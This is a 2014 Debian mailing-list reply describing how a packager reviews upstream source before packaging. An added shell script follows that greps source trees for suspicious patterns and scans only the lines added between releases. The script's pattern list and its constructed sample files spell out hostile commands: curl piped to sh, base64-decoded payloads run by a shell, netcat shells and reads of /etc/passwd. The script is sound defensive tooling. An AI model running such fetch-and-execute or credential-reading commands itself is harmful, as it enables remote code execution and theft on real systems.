On Mon, 29 Sep 2014, John wrote:

> Hey, just for curiosity, do you guys read all the source code before making it
> available on repos?

With a stretch of the definition of 'all', I usually

1. glance/review high-level structure/licenses
2. identify if any 3rd-party module must go into a separate pkg / use the system-wide available one; and strip them
3. depending on the level of trust in the developers, grep for some obvious malicious activities (etc, passwd, etc.)
4. perform a more thorough license/copyright review while also glancing over the code base (in scientific software it is still way too common to find snippets from e.g. Numerical Recipes). Sometimes just do it in mc, sometimes in emacs/dired
5. proceed with packaging; in the next revisions, rely on debdiff to review changes from the previous upload

-- 
Yaroslav O. Halchenko, Ph.D.
http://neuro.debian.net http://www.pymvpa.org http://www.fail2ban.org
Research Scientist, Psychological and Brain Sciences Dept.
Dartmouth College, 419 Moore Hall, Hinman Box 6207, Hanover, NH 03755
Phone: +1 (603) 646-9834 Fax: +1 (603) 646-1419
WWW: http://www.linkedin.com/in/yarik

Archive: https://lists.debian.org/[email protected]
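The grep-based triage in steps 3 and 4 above, and the "only review what changed since the last upload" idea of step 5, as an added example written for this page (it is not code from the message, from Yaroslav, or from Debian's tooling). The pattern list is the editor's own choice of "obvious" things to look for, the sample source tree is constructed on the fly so the script runs offline, and `diff -ruN` between two unpacked trees stands in for the source part of a debdiff; the function and label names are assumptions, not any real tool's interface.

```shell
#!/bin/sh
# Added example: pre-packaging triage of an unpacked source tree.
# Patterns below are illustrative assumptions, not a Debian policy.

# Each line: label<TAB>extended regex. Avoids GNU-only \b and \| so it
# runs under any POSIX grep -E.
suspicious_patterns() {
    printf '%s\t%s\n' \
        passwd-access     '/etc/(passwd|shadow)' \
        pipe-to-shell     '(curl|wget)[^|]*[|][[:space:]]*(ba)?sh' \
        eval-decode       'base64[[:space:]]+-d.*[|][[:space:]]*(ba)?sh|eval[(].*base64' \
        netcat-shell      '(^|[^A-Za-z])nc[[:space:]].*-e[[:space:]]+/bin/(ba)?sh' \
        numerical-recipes 'Numerical Recipes'
}

# scan_tree DIR: prints "label:file:line:text" for every hit in the tree.
# -I skips binaries; .git is excluded so history does not trigger matches.
scan_tree() {
    suspicious_patterns | while IFS="$(printf '\t')" read -r label regex; do
        grep -rEIn --exclude-dir=.git -e "$regex" "$1" 2>/dev/null \
            | sed "s|^|$label:|"
    done
}

# count_hits DIR: number of flagged lines (0 means nothing to look at).
count_hits() { scan_tree "$1" | wc -l | tr -d ' '; }

# has_label DIR LABEL: exit 0 if at least one hit carries LABEL.
has_label() { scan_tree "$1" | grep -q "^$2:"; }

# scan_added OLD NEW: step-5 style review; apply the same patterns only to
# lines *added* between two unpacked trees, ignoring what was already reviewed.
scan_added() {
    suspicious_patterns | while IFS="$(printf '\t')" read -r label regex; do
        diff -ruN "$1" "$2" | grep -E '^[+][^+]' | grep -E -e "$regex" \
            | sed "s|^+|$label:|"
    done
}

# make_sample_tree: constructed, harmless sample sources that exercise the
# patterns (example data, not a real package). Prints the directory.
make_sample_tree() {
    dir=$(mktemp -d)
    mkdir -p "$dir/src" "$dir/debian"
    cat >"$dir/src/build.sh" <<'EOF'
#!/bin/sh
# looks like a normal build step
make all
# suspicious: fetches and executes remote code at build time
curl -s http://example.invalid/setup.sh | sh
EOF
    cat >"$dir/src/util.c" <<'EOF'
/* Adapted from Numerical Recipes in C, 2nd ed. */
#include <stdio.h>
int main(void) { FILE *f = fopen("/etc/passwd", "r"); return f == NULL; }
EOF
    cat >"$dir/src/clean.c" <<'EOF'
#include <stdio.h>
int main(void) { puts("hello"); return 0; }
EOF
    printf '%s\n' "$dir"
}

# make_revision OLD: constructed "next upstream release": a copy of OLD with
# one new suspicious line appended. Prints the new directory.
make_revision() {
    new=$(mktemp -d)
    cp -R "$1"/. "$new"
    printf '%s\n' 'echo "$PAYLOAD" | base64 -d | sh' >>"$new/src/build.sh"
    printf '%s\n' "$new"
}

# Stand-alone run: triage the sample tree, then review only the delta.
if [ "${1:-}" = "--demo" ]; then
    old=$(make_sample_tree); new=$(make_revision "$old")
    echo "== full tree =="; scan_tree "$old"
    echo "== added since previous upload =="; scan_added "$old" "$new"
    rm -rf "$old" "$new"
fi
```

On the constructed tree the full scan flags three lines (the `curl | sh` in build.sh, and both the `/etc/passwd` open and the Numerical Recipes attribution in util.c); the delta scan of the "new release" reports only the freshly added `base64 -d | sh` line, which is the point of reviewing a debdiff rather than the whole tree again. A clean result is not a clean bill of health: these greps catch only the lazy cases, and the license pass still needs a human reading the headers.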

